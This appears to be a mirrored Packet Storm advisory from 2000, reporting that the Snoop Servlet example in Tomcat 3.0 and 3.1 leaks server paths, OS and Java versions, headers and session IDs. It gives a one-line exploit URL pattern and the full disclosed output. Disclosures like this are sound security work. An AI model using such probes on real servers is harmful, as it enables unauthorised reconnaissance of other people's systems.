Lucene search

K

snoop.servlet.txt

🗓️ 20 Jul 2000 00:00:00Reported by Efrain TorresType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Snoop Servlet on Tomcat reveals sensitive information, posing security risks to users.

Show more
Code
`[LoWNOISE] Snoop Servlet (Tomcat 3.1 and 3.0)  
  
  
====PRODUCT:  
Snoop Servlet on Release Build 3.1 and 3.0 of Tomcat from   
Apache Software Foundation.  
  
http://jakarta.apache.org  
  
  
  
====PROBLEM:   
The Snoop Servlet will give you too much info (PATHs, OS, etc.)  
  
====EXPLOIT:  
http://narco.guerrilla.sucks.co:8080/examples/jsp/snp/anything.snp  
  
  
====  
Snoop Servlet  
  
Servlet init parameters:  
  
Context init parameters:  
  
Context attributes:  
javax.servlet.context.tempdir =  
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples  
sun.servlet.workdir =  
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples  
  
Request attributes:  
  
Servlet Name: snoop  
Protocol: HTTP/1.0  
Scheme: http  
Server Name: narco.goverment.sucks.co  
Server Port: 8080   
Server Info: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.1.8; AIX  
4.2 POWER_RS; java.vendor=IBM Corporation)  
Remote Addr: xxx.xxx.xxx.xxx  
Remote Host: xxx.xxx.xxx.xxx  
Character Encoding: null  
Content Length: -1  
Content Type: null  
Locale: en  
Default Response Buffer: 8192  
  
Parameter names in this request:  
  
Headers in this request:  
Host: narco.goverment.sucks.co:8080  
Accept-Encoding: gzip  
Cookie: JSESSIONID=To1212mC7833304641226407At  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png,  
*/*  
Connection: Keep-Alive  
Accept-Charset: iso-8859-1,*,utf-8  
User-Agent: Mozilla/4.51 [en] (Winsucks; I)  
Accept-Language: en  
  
Cookies in this request:  
JSESSIONID = To1212mC7833304641226407At  
  
Request Is Secure: false  
Auth Type: null  
HTTP Method: GET  
Remote User: null  
Request URI: /examples/jsp/snp/anything.snp  
Context Path: /examples  
Servlet Path: /jsp/snp/anything.snp  
Path Info: null  
Path Trans: null  
Query String: null  
  
Requested Session Id: To1212mC7833304641226407At  
Current Session Id: To1212mC7833304641226407At  
Session Created Time: 964047263477  
Session Last Accessed Time: 964047528749  
Session Max Inactive Interval Seconds: 1800  
  
Session values:   
numguess = num.NumberGuessBean@6bfa9a1  
====  
Efrain 'ET' Torres  
[email protected]  
  
[LoWNOISE] Colombia 2000  
  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
20 Jul 2000 00:00Current
7.4High risk
Vulners AI Score7.4
16
.json
Report